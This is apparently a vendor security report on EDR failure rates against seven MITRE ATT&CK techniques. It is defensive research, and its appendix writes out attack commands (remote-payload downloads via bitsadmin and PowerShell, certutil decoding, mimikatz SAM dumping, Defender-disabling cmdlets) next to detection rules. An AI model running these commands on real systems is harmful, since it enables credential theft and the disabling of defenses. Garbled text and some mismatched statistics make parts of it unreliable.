DATA STUDY REPORT

DATA STUDY REPORT

Ending the
Era of Security
Control Failure
A data analytic study of historic security control failures against
top MITRE ATT&CK techniques – and what to do to improve
security program performance.

By Ken Towne, Jonathan Reiber, Shravan Ravi, and Jackson Wells

DATA STUDY REPORT

Introduction: How
ATT&CK techniques that succeeded against
endpoint detection and response (EDR)
security controls. We chose EDR for two
to become a peak reasons: it is the most broadly adopted con-
trol across the industry, and AttackIQ has

performing team a history of developing scenario content to

emulate the adversary, aligned to the MITRE
ATT&CK framework, to test EDR controls.
We then examined a list of top MITRE AT-
Test and train like the best T&CK techniques that break past our cus-
tomers detection capabilities.
After decades of spending on cybersecurity
teams and technologies, from next-gen- The findings from our study are that on
eration firewalls to the Department of De- average, the EDR controls in our custom-
fense’s Cyber Mission Force, the entire ers’ environments only stopped the top
industry is transitioning away from a period seven adversary techniques 39 percent
of hyper-focus on investment and towards a of the time in 2021. This high degree of
focus on outcomes and metrics in security failure is not the fault of security provid-
effectiveness. This transition was driven by ers, as their controls stop the top tech-
two distinct events: the escalating threat in
niques in our laboratory environment.
cyberspace, from the Russian government’s
Nor is it the fault of our customers, who
intrusions into critical infrastructure to
ransomware attacks on civil infrastructure, are some of the most advanced cyberse-
and the second but related feeling that the curity teams in the world. The problem is
investments made over the last decade were embedded in the system itself.
failing to stop intruders. Even as security
teams invested in the people and technol- Complex organisms and organizations
ogies required to stop breaches, intruders need data to understand how well their
kept breaking through. inner workings are performing. Like car
engines, the human body, or the U.S.
The Verizon Data Breach Investigation team military (which has for years conducted
in 2018 found that most breaches in cyber- multi-factor analyses of its “readiness” to
space should have been stopped by existing
perform key missions), security controls
security controls but weren’t. We knew this
of people, processes, and technologies
trend was occurring but didn’t have verifi-
able data about security program perfor- need to be assessed constantly against
mance. To understand the degree of security real threats to validate their effective-
effectiveness within our customer base, we ness. A car engine has a check engine
anonymized customer data from our cloud light. The human body goes to regular
platform in 2021 to identify the top MITRE check-ups and now human beings wear
DATA STUDY REPORT

wearable devices to track their pulse, opposite. From our laboratory environ-
exercise and steps taken, and oxygen- ment at AttackIQ, we know that leading
ation. The U.S. military trains constantly EDR technologies and our customers
on land, air, sea, space, and cyberspace can stop these top seven techniques
to prepare for potential conflicts. Unlike consistently, and therefore our custom-
the human body, a car engine, or the U.S. ers should be able to do so consistently
military, however, cybersecurity teams as well. The issue is that organizations
have until now lacked a means to exer- aren’t testing enough. Information tech-
cise, measure, and report on their health. nology, like the human body, is not stat-
The result is a mismatch. Even the most ic. Misconfigurations, infrastructure
effective technologies and the most changes, and team transitions all lead to
effective teams will fail to stop the adver- degraded security control performance
sary part of the time if they do not test over time. Only by testing controls
and train. against known threats can teams gen-
erate the data they need to understand
Imagine a World Cup qualifying team performance, tune up, and improve ef-
that made it to the first match but had fectiveness. That’s how they can become
failed to prepare for its opponents. Step- a World Cup team.
ping out on the pitch, the opposing team
would run circles around them. This is
the story in cybersecurity today. The
impact of a lack of continuous assess-
ment is that breaches continue to occur,
and adversaries continue to succeed. In
our historical analysis, we found that the
top 7 techniques have been used over
and over in impactful cyberattacks and
intrusions by adversaries like the Conti
ransomware gang and state-sponsored
actors from Russia, China, Iran, North
Korea, and others to achieve their stra-
tegic objectives. We outline the historic
impact of these techniques below.

The problem is not that the defense ca-

pabilities aren’t up to the task. Quite the
DATA STUDY REPORT

The Seven So, what are they not? They are not a top
list of individual techniques by priority or
Deadly Techniques popularity. Other organizations have taken
this approach (to include the Center for
Threat-Informed Defense, of which we
How did we arrive at this 39 percent
are founding research partner). Instead,
statistic? We looked at our customers’
this list represents a solid foundation of
historical performance against a curated
techniques that a customer will see and
list of techniques to see how well they
which our research indicates they will
performed. The goal in selecting these
likely fail to prevent. Our historical data
techniques was to find a sweet spot for
also shows that by testing against these
realistic and popular techniques that could
techniques, customers can adjust their EDR
be prevented by recommended security
configurations to improve security control
configurations but are not currently being
performance.
prevented most of the time. We chose
these key techniques because they fit the Below are the scenarios and techniques
following criteria: that comprise the “Seven Deadly
Techniques.” The column on the left names
1. They match real-word attacks from the AttackIQ scenario (a software-based
threat actors that should concern logical combination of adversary behaviors)
our customers and their engineering that contains the technique within it. The
implementation is accurate. middle column names the known technique
from the MITRE ATT&CK framework of
2. Their usage is common; in other words,
known adversary tactics, techniques, and
they are not edge cases that are
procedures, the world’s leading repository
infrequently reported.
of threat intelligence and threat behavior.
3. They are core functional techniques that The column on the right shows how
help a threat actor achieve their goals. often these techniques are prevented
4. Laboratory evidence shows that the by EDR technologies in our customer’s
recommended configuration settings of environments. Of note, because the data is
EDR solutions should be able to prevent anonymized, we do not have clear visibility
the execution of these techniques. into our customer’s networks to know why
5. Our customers show that these a specific EDR solution failed to prevent a
techniques can be prevented in specific technique. We may pursue such
their environments, proving that our analysis in the future, building on the
prevention measurements are not just research methodologies we developed in the
theoretical but practical and real world. context of our first report.
DATA STUDY REPORT

AttackIQ Scenario MITRE ATT&CK %

Name Technique Number Prevention*

1. BITS Jobs Script Bits Jobs T1197 40%

2. Deobfuscate / Decode Deobfuscate/Decode Files

Files or Information Script or Information T1140 42%

3. Dump SAM hashes with OS Credential Dumping:

Mimikatz using a Volume Security Account Manager 64%
Shadow Copy T1003.002
System Binary Proxy Execu-
4. Mshta Script tion: Mshta T1218.005 48%

Ingress Tool Transfer

5. Remote File Copy Script 34%
T1105
6. Scheduled Task Scheduled Task/Job: Sched-
25%
Masquerading uled Task T1053.005
7. Stop Windows Defend- Impair Defenses: Disable or
er via Encoded Powershell Modify Tools 21%
Script T1562.001

Figure 1: The Seven Deadly Techniques (2021)

DATA STUDY REPORT

Historic Real- 2. Scenario: Remote File Copy Script

World Impact of Ingress Tool Transfer (T1105) | Command

and Scripting Interpreter: PowerShell
the Seven Deadly (T1059.001): PowerShell is one of the most
common sources of threats detected on
Techniques endpoints. Using legitimate built-in func-
tionality, an actor can launch directly from
the command line and instruct PowerShell
Part of the reason we selected these tech- to retrieve a file from a URL and then exe-
niques (and our scenarios that emulate them cute their malicious payload. The destructive
in our platform) is because of their histori- attacks used against Ukraine used this exact
cal success in significant breaches. Below technique to load their initial tools in the
are some of the historical impacts of these beginning stages of their attack.
seven techniques on organizations and how
they have been used by adversaries. 3. Scenario: Deobfuscate / Decode Files
or Information Script
1. Scenario: Dump SAM hashes with
Mimikatz using a Volume Shadow Copy Ingress Tool Transfer (T1105) | Deobfus-
cate/Decode Files or Information (T1140):
OS Credential Dumping: Security Account Certutil is a command-line tool natively
Manager (T1003.002): The Security Ac- found on Microsoft Windows systems that is
count Manager (SAM) is a database in Mi- meant to be used to help validate and verify
crosoft Windows that stores account pass- certificate authority information. The legit-
words and can be used to authenticate local imate functionality of this tool can be mis-
or remote users. The account passwords are used by threat actors to download remote
hashed and stored in a registry hive. Threat payloads and decode encoded files to at-
actors target this file with many different tempt to bypass security detection controls.
tools including pwdump, gsecdump, and Actors have been taking advantage of this
mimikatz to dump the SAM database from tool since at least 2016 and have been
memory or on disk using volume shadow employed by the likes of APT10 (China),
copies. The hashes can then be cracked APT28 (Russia), Oil Rig (Iran), and Konni
offline to recover user passwords. This tech- (North Korea).
nique has been used not only used by nation
state-sponsored actors like APT29 but also 4. Scenario: Mshta Script
cybercriminals like Conti to help facilitate
ransomware attacks. Although Conti has System Binary Proxy Execution: Mshta
disbanded (good riddance!) its techniques (T1218.005): Mshta is a native binary found
continue to live on (sigh) in new ransomware on Microsoft Windows systems that opens
groups, to include groups which former HTML Application (HTA) files which can
Conti members have joined. contain web scripts written in VBScript or
DATA STUDY REPORT

JScript. This file format is frequently used up their process attack chains or for per-
by threat actors directly as a malicious email sistence to survive reboots and shutdowns.
attachment or a file dropped and executed To help their malicious activities blend in and
by macro-enabled Office documents. The hide from analyst detection, actors will use
Russia-linked Gamaredon group leveraged task names that appear to be legitimate up-
this technique in the cyberattacks during date mechanisms. The cybercriminal group
the start of the invasion of Ukraine. Addi- Wizard Spider has used scheduled tasks
tionally, actors like Mustang Panda have named after Google and Windows
found that the mshta tool can be used to applications to help facilitate their
execute malicious script code directly in the ransomware operations.
command line.
7. Scenario: Stop Windows Defender
5. Scenario: BITS Jobs Script via Encoded Powershell Script

BITS Jobs (T1197): The Background Intelli- Impair Defenses: Disable or Modify Tools
gent Transfer Service (BITS) is a file transfer (T1562.001) | Command and Scripting
mechanism found in Microsoft Windows and Interpreter: PowerShell (T1059.001) |
commonly used by legitimate applications Obfuscated Files or Information (T1027):
to use the system’s available idle bandwidth Threat actors will take overt actions to dis-
without disrupting other applications. This able the security tools that could detect or
functionality has been historically abused by prevent their future operations. PowerShell’s
multiple threat actors during their attacks. ability to integrate with Windows internals
APT41 is a Chinese-sponsored threat actor makes it a key tool to be abused in these
who conducted global cyberespionage at- attacks to help facilitate disabling Windows
tacks throughout 2020 that used bitsadmin. tools or controls. Additionally, actors encode
exe to download their 2nd stage payloads. their PowerShell commands to make the
Additionally, the FBI warned about APT39, initial incident response more difficult. The
an Iranian-sponsored threat actor, using Maze ransomware group used PowerShell
BITS to exfiltrate stolen data during their to disable Windows Defender’s real-time
global attacks. monitoring before their encryption process
was executed. They demanded a $15 million
6. Scenario: Scheduled dollar ransom.
Task Masquerading

Scheduled Task/Job: Scheduled Task

(T1053.005) | Masquerade Task or Service
(T1036.004): Scheduled Tasks can be cre-
ated to either initially launch a process at a
pre-determined date and time or repeatedly
execute commands at specific intervals. Ac-
tors leverage both options to either break-
DATA STUDY REPORT

Seven Deadly Techniques

Customers that prevented 100% 
of the Seven Deadly Techniques

Customers that prevented 76% - 99%
of the Seven Deadly Techniques

Customers that prevented 51% - 75% 
of the Seven Deadly Techniques

Customers that prevented 26% - 50% 
of the Seven Deadly Techniques

Customers that prevented 1% - 25% 
of the Seven Deadly Techniques

Customers that prevented 0% 
of the Seven Deadly Techniques

50% Test Point Coverage

Figure 2: A pyramid of prevention failures.

This pyramid shows the degree to which our customers prevented the Seven
Deadly Techniques on 50 percent or more of their test point assets in 2021.

Methodology
How and why do we trust these scenarios to like the attackers themselves, all the scenar-
make the 39 percent determination of aver- ios, assessments, and attack graphs in the
age effectiveness? AttackIQ Security Optimization can be used
in production, at scale, and run concurrently
All these scenarios were manually dou- against all a customer’s assets at once.
ble-checked for accuracy to determine how
well they match real world actors’ use of For those interested in the specifics, Ap-
the same techniques. In our data analysis, pendix A outlines a technical analysis of the
we measured how well the techniques per- seven scenarios against real-world exam-
formed against at least 50 percent of our ples. Finally, it should be noted that all these
host agents (which measure security control scenarios were run as system which means
performance) in our customers’ environ- they are running with the highest privileg-
ments. We confirmed that those scenarios es possible on the host. This means that if
were blocked by EDR tools in our internal AttackIQ’s Security Optimization Platform
labs and then validated that our expectation measures a prevention at that level, it would
of a prevented status could be found in our measure a prevention at a lower level as
external customer implementations. Finally, well. When we ran our tests in the AttackIQ
DATA STUDY REPORT

labs, we ran the scenarios with the highest

system level permissions instead of down- Conclusion:
Elevating
grading the agents’ permissions with a
lower-level user account. This ensured that
any preventions we recorded were the re-
sult of an EDR’s behavioral-based detection
instead of a permissions issue. If the EDR
Cybersecurity
could prevent the system account per-
forming these actions, they would prevent Effectiveness
a standard account from performing that Security teams can improve their cyberse-
same action. If we did the reverse, we may curity readiness through continuous test-
incorrectly assume an EDR control prevent- ing and security control validation, running
ed the scenario when the reality is a normal assessments aligned to the MITRE AT-
account simply cannot access that resource. T&CK framework against the total security
Any skilled threat actor would have already program. AttackIQ built the world’s first
escalated their privileges before attempting Security Optimization Platform to run as-
to use those techniques, so it is also a more sessments and comprehensive adversary
realistic representation. One caveat is that it emulations, to include the AttackIQ Attack
is possible that running as a lower privileged Graphs, to emulate the adversary with spec-
user would increase the prevention counts – ificity and realism. AttackIQ then generates
which could appear positive. The more likely real-time performance data that your secu-
outcome, however, is that an experienced rity team can use to measure effectiveness
attacker would properly escalate their privi- over time or at a single moment in time to
leges prior to conducting those techniques. make data and threat-informed decisions
about security program performance. This
If an organization cannot prevent these is what it means to adopt a threat-informed
techniques as a privileged user, they will defense. To help organizations adopt a
struggle when the adversary escalates their threat-informed defense strategy, AttackIQ
privileges within their environment. A EDR is a founding research partner of the Center
runs to stop specific behaviors, not access for Threat-Informed Defense at MITRE En-
permissions. The EDR will be agnostic to the genuity, advancing the state of the art and
type of user running and focus instead on
the kinds of behaviors being run. These pre-
ventions do not occur only in the lab: Given
that our customers are preventing the tech-
niques to some degree, we know they are
preventable in the real world. Some custom-
ers must be following similar policies, or they
wouldn’t be preventing the techniques. The
fact that the customers and EDR solutions
are stopping such techniques at an atomic
level is good news.
DATA STUDY REPORT

the state of the practice to help improve the world’s cybersecurity effectiveness. Other founding
research partners include JPMorgan Chase, Bank of America, Citi, Fortinet, HCA Healthcare, and
IBM Security.

Figure 3. AttackIQ Attack Graph response to US-CERT AA22-083A,

HAVEX malware targeting the energy sector.

Figure 4: Illustrative examples of historic, graphical data of security

control performance against an assessment.

The impact of continuous security control validation and a threat-informed defense strategy
is significant, and can help drive down security control failures and elevate cybersecurity
effectiveness. A study by the analyst firm IDC of existing AttackIQ customers found that
“substantial benefits were achieved as a result of deploying AttackIQ to test cybersecurity
readiness and validate the effectiveness of security programs. Specifically, they noted significant
improvements in the efficiency of security staff and risk reduction, the importance of purple
teaming, and the value of AttackIQ Academy”, the company’s free online course in breach and
attack simulation and the practice of threat-informed defense. The IDC report of AttackIQ
customers found that continuous security control validation led to 47 percent more efficient
security operations teams, a 44 percent reduction in potential costs of security breaches, and 35
percent less impactful breaches overall.1

Finally, the IDC study found that by aligning red teams and blue teams in a process of purple
teaming for continuous testing, organizations could save at least $4.7 million in threat response
expenditures. When asked why this was the case, one customer said, “Business risk has been re-
duced, because with AttackIQ we can measure where things work well. If something isn’t work-
ing, we can take steps to address that.” By running adversary emulations against an organiza-
tion’s security program, an organization2 can improve its performance against key adversaries like
APT29, the Conti Ransomware Group, or Muddy Waters, to name a few of the organizations that
have employed the Seven Deadly Techniques throughout recent history. By embracing a heuris-
tic-focused defense capability, investing in a defense-in-depth strategy that protects high-value
assets and adopts an assume breach mindset, and by deploying a threat-informed defense strat-
egy for continuous security control validation, customers can generate real-time data to elevate
their security program effectiveness and keep intruders out.
1 Source - IDC Infographic, sponsored by AttackIQ, The Business Value of AttackIQ Security Optimization Platform, doc #US49454222 and July 2022
2 Ibid
DATA STUDY REPORT

Appendix A
This technical appendix shows how our scenarios closely match real-world techniques. It then
discusses mitigation processes and offers sigma rules for improving customers’ detection of
these techniques.

Mitigation process:

1. BITS Job Script: This scenario uses the Background Intelligent Transfer Service (BITS) to
download a remote payload to a temporary directory. This is a mechanism found in Microsoft
Windows and commonly used by legitimate applications to use the system’s available idle
bandwidth to retrieve files without disrupting other applications.

A PowerShell script is executed on the targeted host and executes the following commands to
create and stage a file to be downloaded from a remote server:

- bitsadmin /Create AIQDownloadJob

- bitsadmin /SetCustomHeaders <job id> “Authorization: Basic <password>”
>$null 2>&1
- bitsadmin /SetPriority <job id> “FOREGROUND” >$null 2>&1
- bitsadmin /AddFile <job id> “<malicious url>” “$env:TMP\attackiq_bits_
jobs\evil.exe”

Then the following command is executed to begin the BITS Job transfer, monitor progress for
successful transfer, and mark the job complete:

- bitsadmin /Resume <job id>

- bitsadmin /info $global:job_id /verbose
- bitsadmin /Complete $job_id

Our scenario activity is a direct match with (or similar to) the following reported examples:

- Mandiant Report on BITS Abuse - bitsadmin /addfile download <malicious

url> C:\windows\malware.exe | bitsadmin /resume download
- Prometheus TDS - bitsadmin /addfile EncodingFirm <malicious url> C:\
Users\<User>\AppData\Local\Temp\DefineKeeps.tmp
- Ferocious Kitten - bitsadmin /addfile pdj “<malicious url>” %PUBLIC%\
AppData\Libs\p.b | bitsadmin /resume pdj
DATA STUDY REPORT

- APT41 - bitsadmin /transfer bbbb <malicious url> C:\Users\Public\in

stall.bat
- Egregor Ransomare - bitsadmin /transfer debjob /download /priority
normal <malicious url> C:\Windows\b.dll

Detection details:

With an EDR or SIEM product, you can create detections to look for suspicious use of the Bitsad-
min tool on windows devices by using the following detection logic:

Process Name == (“cmd.exe” OR “powershell.exe”)

Command Line CONTAINS (“/transfer” OR (“/addfile” AND “download”)
Username NOT IN <List of expected Bitsadmin users>

Mitigation details:

MITRE has provided the following mitigation steps for BITS Jobs (T1197)
• M1037 - Filter Network Traffic
• M1028 - Operating System Configuration
• M1018 - User Account Management

Customer prevention statistics for this scenario: 29 prevented out of 72 run, with a
prevention rate of 40 percent.

Mitigation process:

2. Deobfuscate / Decode Files or Information Script: This scenario uses certutil.exe to decode a
base64 file into a malicious executable. Certutil is a command-line tool natively found on Mic
rosoft Windows systems that is meant to be used to help validate and verify certificate
authority information. The certificate authority files are commonly encoded in base64 so the
tool has the built-in functionality to decode this common encoding format.

A batch file is executed on the targeted host, and it launches certutil.exe with the follow
arguments to decode a base64 encoded executable into a binary named “calc.exe” located in a
temporary directory.

- certutil.exe -decode <encoded file> %temp%\attackiq_obfuscate_deobfus

cate\calc.exe >nul 2>&1
DATA STUDY REPORT

Our scenario activity is a direct match for (or similar to) the following examples:

- SentinelOne Living off the Land with Certutil - certutil -decode

malicious1.txt malicious.gzip
- APT28 - certutil -decode C:\Programdata\<random>.txt C:\Program
data\<random>.exe
- APT10 - certutil -decode %temp%\\<malicious file>.txt %temp%\\YjhdJ.cab
- APT10 - certutil -decode C:\ProgramData\padre1.txt C:\ProgramData\\
GUP.txt
- APT34 - certutil -f -decode C:\ProgramData\Windows\Microsoft\java\dUp
dateCheckers.base cUpdateCheckers.bat

Detection details:

With an EDR or SIEM product, you can create detections to look for suspicious use of the Certutil
binary on windows devices by using the following detection logic:

Process Name == (“cmd.exe” OR “powershell.exe”)

Command Line CONTAINS (“certutil” AND (“decode” OR “-d”))
Username NOT IN <List of expected certutil users>

Mitigation details:

It is recommended that only administrators and authorized users have access to utilizing system
interpreters such as cmd.exe and powershell.exe, as well as system binaries such as certutil.exe.
This will limit the chance of malicious actors carrying out this technique on compromised
end users.

Customer prevention statistics for this scenario: 24 prevented out of 57 run, with a 42 per-
cent prevention rate.

Mitigation process:

3. Dump SAM hashes with Mimikatz using a Volume Shadow Copy: The Security Account
Manager (SAM) is a database in Microsoft Windows that stores account passwords and can
be used to authenticate local or remote users. The account passwords are hashed and stored
in a registry hive. The file is locked by the operating system and it cannot normally be read by
other applications. A Volume Shadow Copy is service in Windows that makes point-in-time
copies of files including those that are normally locked and unreadable on the host. This
scenario abuses Volume Shadow Copy to make a backup of that locked file which can then be
used by Mimikatz to dump credentials.

A PowerShell command is first executed to create a Volume Shadow Copy:

DATA STUDY REPORT

- (Get-WMIObject Win32_ShadowCopy -List).Create(“C\\”, “ClientAccessi

ble”) | Select-Object ReturnValue,ShadowID | ConvertTo-Json

Once the Volume Shadow Copy is created, the SAM hive is copied to a temporary directory. Mim-
ikatz is then written to disk and executed with the following arguments:

- mimikatz lsadump::sam /system:C:\WINDOWS\TEMP\ai_ooqpyfg8 /sam:C:\

WINDOWS\TEMP\ai_o9tdgsv8

Our scenario activity is a direct match for (or similar to) the following examples:

- WmiSploit - $NewShadowVolume = ([WMICLASS]”root\cimv2:Win32_Shadow

Copy”).Create(“$RemotePath”.SubString(0,3), “ClientAccessible”)
- APT3 - mimikatz !lsadump:sam
- HackerSploit – mimikatz lsadump::sam

Detection details:

For detecting and/or preventing this attack through Anti-Virus, we encourage placing systems in
a Quarantine policy and ensure that prevention is enabled for static and dynamic analysis results.
Additionally, ensuring that AV’s have updated blocklist entries for known Mimikatz signatures will
help ensure that this binary will be quarantined if attempted to be placed on disk.

For detecting and/or preventing this attack through EDR or SIEM products, we encourage using
the below detection details to alert when shadow copies are being created for the Mimikatz pay-
load to read from:

Process Name == “powershell.exe”

Command Line CONTAINS (“Win32_Shadow Copy” AND “Create”)
Username NOT IN <List of expected administrators using the ShadowCopy
commandlet>

Mitigation details:

MITRE has provided the following mitigation steps for OS Credential Dumping: Security Account
Manager (T1003.002)
• M1028 - Operating System Configuration
• M1027 - Password Policies
• M1026 - Privileged Account Management
• M1017 - User Training

Customer prevention statistics for this scenario are: 59 prevented out of 91 run, with a 64
percent prevention rate.
DATA STUDY REPORT

Mitigation process:

4. Mshta Script: Mshta is a native binary found on Microsoft Windows systems that opens
HTML Application (HTA) files which can contain web scripts written in VBScript or JScript.
Additionally, raw script code can be passed via the command line to be directly executed. Our
scenario uses that technique to get MSHTA to launch another binary.

A batch file is executed that copies a malicious executable to a temporary directory and then
MSHTA is launched with arguments containing VBScript code to open that executable.

- mshta.exe vbscript:CreateObject(“Wscript.Shell”).Run(“%temp%\attack
iq_mshta\binary.exe”,0,true)(window.close) > nul 2>&1

Our scenario activity is a direct match for (or similar to) the following examples:

- Cobalt Kitty - mshta.exe Error! Hyperlink reference not valid.lan

guage=\”vbscript\” src=\”<malicious url>\”>code close</script>’
- FIN7 - vbscript:Execute(“On Error Resume Next:set w=GetOb
ject(,””Word.Application””):execute w.ActiveDocument.Shapes(2).Text
Frame.TextRange.Text:close”)
- Muddy Water - mshta vbscript:Close(Execute(“”CreateObject(“”””WScript.
Shell””””).Run””””powershell.exe

Detection details:

For detecting and/or preventing this attack through EDR or SIEM products, we encourage using
the below detection details to alert when mshta.exe is being use din a possible malicious manor:

Process Name == (“cmd.exe” OR “powershell.exe”)

Command Line CONTAINS (“mshta” AND “vbscript” AND (“CreateObject” OR
“Execute”) AND “Wscript.Shell”)

Mitigation details:

MITRE has provided the following mitigation steps for System Binary Proxy Execution: Mshta
(T1218.005)
• M1042 - Disable or Remove Feature or Program
• M1038 - Execution Prevention

Customer prevention statistics for this scenario: 39 prevented out of 81 run, with a 48 per-
cent prevention rate.
DATA STUDY REPORT

Mitigation process:

5. Remote File Copy Script: PowerShell is one of the most common sources of threats detected
on endpoints. Using legitimate built-in functionality, an actor can launch directly from the com
mand line and instruct PowerShell to retrieve a file from a URL and then execute their
malicious payload. This scenario performs that behavior to download a remote file to a
temporary directory.

The following PowerShell commands are executed to download a remote malicious file:

- $webclient = New-Object System.Net.WebClient

- $webclient.DownloadFile(“<malicoius url>”, “$env:TEMP\helloworld.exe”)

Our scenario activity is a direct match for (or similar to) the following examples:

- Ukraine Wiper - powershell -c “(New-Object System.Net.WebClient).

DownloadFile(‘<malicious url>’,’CSIDL_SYSTEM_DRIVE\temp\sys.tmp1’)” 1>
\\127.0.0.1\ADMIN$\__1636727589.6007507 2>&1
- CrowdStrike Blocking Malicious PowerShell Downloads - powershell.
exe -windowstyle hidden $d=$env:temp+[char][byte]92+’1478810889388.
js’;(new-object system.net.webclient).downloadfile(‘http’+’<malicious
url>’,$d);invoke-item $d;
- Emotet - Net.WebClient.DownloadFile”($url, $env:userprofile\937.exe);

Detection details:

For detecting and/or preventing this attack through EDR or SIEM products, we encourage
using the below detection details to alert when powershell is being used to download files onto
the system:
Process Name == “powershell.exe”
Command Line CONTAINS ((“DownloadFile” OR “Invoke-WebRequest” OR
“IWR”) AND “http”)

Mitigation details:

MITRE has provided the following mitigation steps for Command and Scripting Interpreter: Pow-
erShell (T1059.001)
• M1049 - Antivirus/Antimalware
• M1045 - Code Signing
• M1042 - Disable or Remove Feature or Program
• M1038 - Execution Prevention
• M1026 - Privileged Account Management
DATA STUDY REPORT

The scenario was prevented in our labs by: Cisco and Cybereason. The scenario was detectedin
our labs by: Microsoft Defender. Customer prevention statistics for this scenario: 13 prevented
out of 38 run, with a prevention rate of 34 percent.

Mitigation process:

6. Scheduled Task Masquerading: Scheduled Tasks can be created to either initially launch a
process at a pre-determined date and time or repeatedly execute commands at specific
intervals. This scenario creates a scheduled task using the native Windows utility “schtasks.
exe”. The created task is named to appear as an AdobeFlashSync update and it launches a
batch file in temporary directory from the System account.

The scheduled task is created and set to run in 60 seconds from its initial creation.

- schtasks.exe /Create /tn AdobeFlashSync /sc once /f /tr cmd /c C:\WIN

DOWS\TEMP\ai-ft1qzmpe.bat /st 19:16:42 /ru system

After the task is executed, the schtasks utility is used to check to see if the task still exists and if
it was successfully executed.

- schtasks.exe /query /tn AdobeFlashSync

Our scenario activity is a direct match for or (similar to) the following examples:

- FIN7 – schtasks.exe /create /tn “AdobeFlashSync” /tr “wscript.exe //B

/e:jscript \Users\{User name}\{Random GUID}\{Random values}.txt” /sc
minute /mo 25
- Dark Halo - schtasks /create /F /tn “\Microsoft\Windows\SoftwarePro
tectionPlatform\EventCacheManager” /tr “C:\Windows\SoftwareDistribu
tion\EventCacheManager.exe” /sc ONSTART /ru system
- APT32 – schtasks /create /sc MINUTE /tn “Windows Schedule Maintenance”
- Machete - SCHTASKS /create /ST 00:00:01 /SC MINUTE /MO 03 /TR “C:\
Users\%USERNAME%\AppData\Roaming\Chrome\Google\Chrome.exe” /TN Chrome

Detection details:

For detecting and/or preventing this attack through EDR or SIEM products, we encourage using
the below detection details to alert when scheduled tasks are being created:

Process Name == (cmd.exe OR powershell.exe)

Command Line CONTAINS (“schtasks” AND “/create” AND (“cmd” OR power
shell”) AND (“.exe” OR “.bat”) AND “/ru system”)
DATA STUDY REPORT

Mitigation details:

Mitres mitigations for Scheduled Tasks (T1053.005)

• M1047 - Audit
• M1028 - Operating System Configuration
• M1206 - Privileged Account Management
• M1018 - User Account Management

Customer prevention statistics: 7 preventions out of 27 run, with a 25 percent

prevention rate.

Mitigation process:

7. Stop Windows Defender via Encoded Powershell Script: Encoded PowerShell commands
are commonly used to try and obfuscate the code’s true intentions by making it difficult to
read or decipher with an atomic signature. This scenario uses a common PowerShell
obfuscation tool to encode a PowerShell script that disables Windows Defender.

The original script is first encoded with base64 and then it is executed with the -encodedCom-
mand parameter.

- powershell.exe -InputFormat None -EncodedCommand JABNAHAAUAByAGUAZgB

zAF8AQgBlAG

When decoded, the following PowerShell cmdlets are executed disabling the various components
of Windows Defender:

- Set-MpPreference -DisableRealtimeMonitoring $true

- Set-MpPreference -DisableBehaviorMonitoring $true
- Set-MpPreference -DisableBlockAtFirstSeen $true
- Set-MpPreference -DisableIOAVProtection $true
- Set-MpPreference -DisableScriptScanning $true

Our scenario activity is a direct match for or similar to the following examples:

- TrickBot - Set-MpPreference -DisableRealtimeMonitoring $true

- AV Manipulation - Set-MpPreference -DisableBehaviorMonitoring $true
- Detecting Ransomware Precursors - Set-MpPreference -DisableRealtime
Monitoring $true
DATA STUDY REPORT

Detection details:

For detecting encoded powershell being ran, utilize the below query for EDR or SIEM
related products:

Process Name == powershell.exe

Command Line REGEX ((-e|-encoded) (?:[A-Za-z\d+\/]{4})*(?:[A-Za-z\
d+\/]{3}=|[A-Za-z\d+\/]{2}==)?$)

For detecting plain text attempts to disable Windows Defender, utilize the below query for EDR or
SIEM related products:

Process Name == powershell.exe

Command Line CONTAINS(“Set-MpPreference” AND “Disable” AND “$true”)

Mitigation details:

Mitres mitigations for Impair Defenses: Disable or Modify Tools (T1562.001)

• M1022 - Restrict File and Directory Permissions
• M1024 - Restrict Registry Permissions
• M1018 - User Account Management

Customer prevention statistics: 11 prevented out of 43 run, with a 25 percent prevention rate.

AttackIQ has customers that use the AttackIQ Security Optimization Platform on their premises and disconnected
from the cloud, many in the U.S. government, and we did not have access to those customers data during the course
of this study.